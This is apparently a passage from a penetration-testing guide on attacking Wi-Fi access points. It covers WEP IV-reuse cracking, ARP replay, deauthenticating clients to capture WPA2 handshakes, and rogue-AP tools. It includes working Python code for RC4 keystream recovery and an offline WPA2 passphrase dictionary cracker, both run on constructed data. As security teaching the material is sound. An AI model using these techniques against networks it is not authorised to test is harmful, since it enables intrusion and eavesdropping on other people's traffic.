A wireless access point (WAP) enables wireless devices to connect to a local network, typically using Wi-Fi (IEEE 802.11). Because a WAP is an entry point into the network and transmits data over the air, where anyone within radio range can receive it, it is a worthwhile target to dedicate testing resources to.
A WAP's susceptibility to compromise usually depends on the strength of its encryption scheme. WAPs using the obsolete Wired Equivalent Privacy (WEP) scheme are especially vulnerable to intrusion. WEP encrypts each frame with the RC4 stream cipher, seeded with a 24-bit initialization vector (IV) prepended to the shared key; the IV is sent in the clear with the frame. The IV space is so small (about 16.7 million values) that on a busy network IVs start to repeat after a few thousand frames, and a repeated IV means a reused RC4 keystream, which lets you recover plaintext from any two frames that share it. Worse, the way WEP prepends the IV to the key lets statistical attacks on RC4's key schedule (the FMS, KoreK and PTW attacks implemented in aircrack-ng) recover the shared key itself from tens of thousands of captured IVs, usually within minutes. In practice you put a wireless interface into monitor mode (airmon-ng), capture the target's traffic to a file (airodump-ng), and run aircrack-ng against the capture. If the network is quiet, you can speed up IV generation by injecting traffic with aireplay-ng: perform a fake authentication (or spoof the MAC address of a client that is already associated), capture an encrypted ARP request, which is recognisable by its fixed size, and replay it so that the WAP answers every copy with a fresh IV.
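The keystream-reuse problem behind WEP's short IV, as an added example that is not part of the original text: a plain RC4 implementation, WEP's IV || key construction, recovery of a second frame's plaintext from one frame whose contents are predictable (an ARP request, which is exactly why aireplay-ng replays ARP), and the birthday-bound arithmetic behind "a few thousand packets". The key, addresses and frames are constructed for the demonstration; the CRC-32 ICV and the FMS/KoreK/PTW key-recovery statistics are omitted.

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 possible IVs


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the output generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, shared_key: bytes, frame_body: bytes) -> bytes:
    """WEP seeds RC4 with IV || shared key; the 3-byte IV travels in the clear.
    The CRC-32 ICV that real WEP appends is omitted here."""
    return xor_bytes(frame_body, rc4_keystream(iv + shared_key, len(frame_body)))


def recover_from_iv_reuse(c_known: bytes, p_known: bytes, c_target: bytes) -> bytes:
    """Two frames encrypted under the same IV share the same per-packet key and
    therefore the same keystream: keystream = c_known XOR p_known, and that
    keystream decrypts c_target (for as many bytes as the known plaintext covers)."""
    keystream = xor_bytes(c_known, p_known)
    return xor_bytes(c_target, keystream)


def iv_collision_probability(n_frames: int) -> float:
    """Birthday bound: P(at least one repeated IV) among n frames with random
    24-bit IVs. Cards that count IVs sequentially repeat deterministically
    after 2^24 frames instead, but many implementations picked IVs randomly."""
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2.0 * IV_SPACE))


def expected_frames_until_repeat() -> float:
    """Mean number of random-IV frames until the first repeat: sqrt(pi * 2^24 / 2)."""
    return math.sqrt(math.pi * IV_SPACE / 2.0)


# --- constructed sample data (not captured traffic) ---
SHARED_KEY = bytes.fromhex("0123456789")   # a 40-bit WEP key chosen for the demo
IV = bytes.fromhex("a1b2c3")               # the IV both frames happen to use
# An ARP request is fully predictable once the MACs and IPs are known; this is why
# replaying ARP is the standard way to harvest IVs. LLC/SNAP header, then ARP body.
ARP_REQUEST = bytes.fromhex(
    "aaaa03000000" "0806"            # LLC/SNAP, EtherType ARP
    "0001" "0800" "06" "04" "0001"   # Ethernet/IPv4, hw len 6, proto len 4, request
    "001122334455" "c0a80001"        # sender MAC / IP (constructed)
    "000000000000" "c0a80064"        # target MAC / IP (constructed)
)
# A second frame (LLC/SNAP + IP EtherType + payload) the attacker wants to read.
SECRET_FRAME = bytes.fromhex("aaaa03000000" "0800") + b"user=admin&pass=hunter2"


def demo() -> bytes:
    """Encrypt both frames under the same IV and read the secret one back."""
    c_arp = wep_encrypt(IV, SHARED_KEY, ARP_REQUEST)
    c_secret = wep_encrypt(IV, SHARED_KEY, SECRET_FRAME)
    return recover_from_iv_reuse(c_arp, ARP_REQUEST, c_secret)


if __name__ == "__main__":
    print(demo())
    print(round(expected_frames_until_repeat()), "frames until an IV repeats on average")
    print(f"P(repeat after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

The known-plaintext recovery only yields as many keystream bytes as the predictable frame is long (36 bytes for an ARP request), which is enough to read headers and short payloads; full key recovery in aircrack-ng comes from the statistical attacks on the RC4 key schedule, not from this XOR trick alone.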
Most Wi-Fi networks today use WPA/WPA2, which replaces WEP's per-packet key construction with a proper key hierarchy, so the IV attacks above do not apply. Cracking a WPA/WPA2-Personal passphrase is therefore considerably more difficult. The usual approach is offline: capture the four-way handshake between a client and the WAP (airodump-ng saves it; if no client is connecting, aireplay-ng can deauthenticate one so that it reconnects and performs the handshake again), then run a dictionary or brute-force attack against the capture. Every candidate passphrase has to be expanded with PBKDF2-HMAC-SHA1 (4096 iterations, salted with the SSID) before the handshake's message integrity code can be checked, so throughput is limited to a few thousand guesses per second per CPU core with aircrack-ng, and precomputed tables are only useful for one SSID. A short or dictionary passphrase still falls quickly, but a long random one is infeasible. Online attacks are also difficult to pull off, because many WAPs have a lockout function that activates after a certain number of failed attempts.
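What cracking a captured handshake offline actually computes, as an added example written for this page rather than taken from aircrack-ng: the PBKDF2 passphrase expansion, the 802.11i PRF that derives the pairwise transient key, and the EAPOL MIC check that tells a cracker when a candidate passphrase is right. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed here; a real tool would read them from an airodump-ng capture.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iters, 256 bits).
    This derivation is the cost that throttles offline guessing."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, n_bytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < n_bytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:n_bytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (48 bytes: KCK | KEK | TK) from the PMK, both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    """What a cracker needs from a captured four-way handshake (messages 1 and 2)."""
    ssid: str
    aa: bytes            # AP (authenticator) MAC
    spa: bytes           # station (supplicant) MAC
    anonce: bytes        # from message 1
    snonce: bytes        # from message 2
    eapol_zeroed: bytes  # message 2's EAPOL-Key frame with the MIC field zeroed
    mic: bytes           # the MIC message 2 actually carried


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: PMK -> PTK -> KCK per candidate, then compare MICs."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        ptk = derive_ptk(pmk, hs.aa, hs.spa, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], hs.eapol_zeroed), hs.mic):
            return candidate
    return None


def build_eapol_m2(snonce: bytes, rsn_ie: bytes) -> bytes:
    """A minimal EAPOL-Key message 2 (802.1X type 3) with the MIC field zeroed."""
    body = (b"\x02"                      # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"                # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"                # key length 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID
            + bytes(16)                  # MIC field, zero for the computation
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_sample_handshake(real_passphrase: str) -> Handshake:
    """Constructed stand-in for a capture: the 'victim' side computes a genuine MIC."""
    ssid = "CorpGuest"                                    # constructed
    aa = bytes.fromhex("0a1b2c3d4e5f")                    # constructed AP MAC
    spa = bytes.fromhex("ca5e10c0ffee")                   # constructed client MAC
    anonce = bytes(range(32))                             # constructed nonces
    snonce = bytes(range(100, 132))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK
    eapol_zeroed = build_eapol_m2(snonce, rsn_ie)
    kck = derive_ptk(pmk_from_passphrase(real_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return Handshake(ssid, aa, spa, anonce, snonce, eapol_zeroed, eapol_mic(kck, eapol_zeroed))


if __name__ == "__main__":
    captured = make_sample_handshake("correct horse battery")
    print(crack(captured, ["123456", "password", "correct horse battery"]))
```

`pmk_from_passphrase` dominates the run time, which is why real crackers parallelise it across cores or a GPU while the MIC comparison stays cheap. Any reimplementation should be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE" gives the PMK starting f42c6fc5...) before trusting its results on a real capture.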
There are a number of good tools you can use to attack wireless access points and their clients. Here are a few examples:
- The Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and many others)—a complete set of tools for wireless monitoring, attacking, testing, and cracking
- Kismet—a wireless sniffer, network detector, and intrusion detection system
- Wifite—an automated attack tool (it drives aircrack-ng, reaver and others for you) for WEP, WPA, and WPS networks
- WiFi-Pumpkin—a rogue access point framework for creating an evil twin and running man-in-the-middle attacks against the clients that join it
- WiFi Pineapple—a purpose-built hardware device from Hak5 that packages rogue-AP and wireless man-in-the-middle attacks behind a web interface